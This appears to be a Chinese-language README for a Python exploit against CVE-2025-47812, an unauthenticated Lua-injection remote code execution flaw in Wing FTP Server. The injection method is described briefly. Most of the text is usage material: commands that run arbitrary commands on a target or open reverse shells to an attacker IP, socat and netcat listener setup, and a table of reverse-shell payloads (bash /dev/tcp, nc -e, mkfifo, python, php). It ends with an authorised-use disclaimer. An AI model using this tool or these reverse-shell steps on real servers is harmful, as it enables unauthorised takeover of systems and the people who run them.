| 字段 | 值 |
|---|---|
| CVE | CVE-2025-47812 |
| 影响版本 | Wing FTP Server < 7.4.4 |
| 类型 | 未认证远程代码执行 |
| CVSS 评分 | 10.0(严重) |
| 修复版本 | Wing FTP Server 7.4.4 |
漏洞存在于 /loginok.html 登录端点。服务器未能正确过滤 username 字段中的空字节(%00)。攻击者可以利用这一点将任意的 Lua 代码 注入到会话文件中,这些文件随后在访问 /dir.html 等端点时被服务器端执行——整个过程无需任何认证。
参考链接: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
--payload 参数指定特定载荷-o 将命令输出保存到文件--timeout 和 --delay-v)Ctrl+Cpip install requests
python3 wingftp_rce_exploit.py
# 执行命令
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# 将输出保存到文件
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# 反弹 Shell(尝试所有载荷)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# 反弹 Shell(指定载荷)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
-u / --url 目标基础 URL
-U / --username 登录用户名(默认:anonymous)
-c / --command 要执行的命令(命令模式)
-r / --rhost 你的监听 IP(反弹 Shell 模式)
-p / --rport 你的监听端口(反弹 Shell 模式)
--payload 指定使用的载荷(参见下方列表)
--timeout HTTP 请求超时时间(秒,默认:10)
--delay 载荷尝试之间的延迟(秒,默认:4)
-o / --output 将命令输出保存到文件
-v / --verbose 启用调试输出
目标 URL : http://192.168.1.10:5466
用户名 : anonymous
选择 : 1
命令 : whoami
步骤 1 — 启动监听器(推荐使用 socat 以获得完整 TTY):
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
或者使用 nc:
nc -lvnp 4444
步骤 2 — 运行利用程序:
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
本工具仅供教育目的及授权的安全测试使用。
严禁用于非你所有或未经明确书面授权的系统。
未经授权的使用是违法的。作者不对滥用行为承担任何责任。
| 名称 | 方法 |
|---|
socat | 通过 socat 获取完整 PTY |
bash | /dev/tcp 重定向 |
python3 | Socket 子进程 |
nc-e | 带 -e 参数的 Netcat |
nc-fifo | Netcat + mkfifo |
php | PHP fsockopen |